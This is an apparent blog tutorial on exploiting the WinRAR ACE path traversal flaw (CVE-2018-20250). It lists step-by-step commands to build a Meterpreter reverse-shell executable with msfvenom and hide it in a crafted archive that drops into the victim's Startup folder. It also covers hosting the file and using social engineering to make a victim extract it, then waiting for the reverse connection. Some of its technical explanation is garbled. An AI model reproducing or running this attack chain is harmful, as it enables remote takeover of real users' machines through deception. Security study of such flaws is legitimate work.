Code Execution from WinRAR

In this post, we are going to discuss how WinRAR has patched serious security faults last month, one of the world’s most popular Windows file compression applications, which can only be exploited by tricking a WinRar user to extract malicious archives. The vulnerability identified last year by research.checkpoint.com affects all versions released in all WinRAR over the past 19 years.

More About Evil Winrar

CVE-ID: CVE-2018-20250, CVE-2018-20251, CVE-2018-20252, and CVE-2018-20253

Patched Version: WinRAR 5.70 Beta 1

This vulnerability is due to the UNACEV2.DLL library included with all versions of WinRAR. The winrar uses the ACE format to compress the folder and unpack the compressed folder with the help of UNACE.DLL.

In WinRAR versions prior to and including 5.61, There is path traversal vulnerability when crafting the filename field of the ACE format (in UNACEV2.dll). When the filename field is manipulated with specific patterns, the destination (extraction) folder is ignored, thus treating the filename as an absolute path. This happens due to improper compilation when unace.dll come into the face.

Let’s download a python script that will generate a malicious file archive in a rar format. Once you download the python script, install the dependency required for it.

git clone //github.com/manulqwerty/Evil-WinRAR-Gen.git
cd Evil-WinRAR-Gen/
pip3 install -r requirements.txt

Further, you need to give full permission to the python script inside the Evil-Winrar-Gen folder and then generate a malicious exe file with the help of msfvenom and name as “winrar.exe” as shown and multi handler inside Metasploit.

chmod 777 evilWinRAR.py
msfvenom -p windows/meterpreter/reverse_tcp lhost= lport=1234 -f exe > winrar.exe

Now create a text file that will display to the victim when he extracts the rar file to confuse him. Then execute evilWinrar python script along with malicious exe file and text file, creating a malicious archive that you can send to the target.

touch winrar.txt
./evilWinRAR.py -e winrar.exe -g winrar.txt
python -m SimpleHTTPServer 8080

As said, this vulnerability allows us to extract the malicious file in the arbitrary path, with the help of this script we will allow rar files extraction in the /startup program. Now use social engineering for transferring the malicious rar to the victim and wait for the victim to restart his machine to obtain reverse connection of the target.

There is currently no startup program in the target machine as shown below. Once the victim extracts the malicious rar file “evil.rar,” our winrar.exe backdoor will extract from the startup program.

To ensure for winrar.exe file in the startup folder, type shell:startup in the run prompt.

As soon as the victim will restart the machine, you will get a reverse connection as shown.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here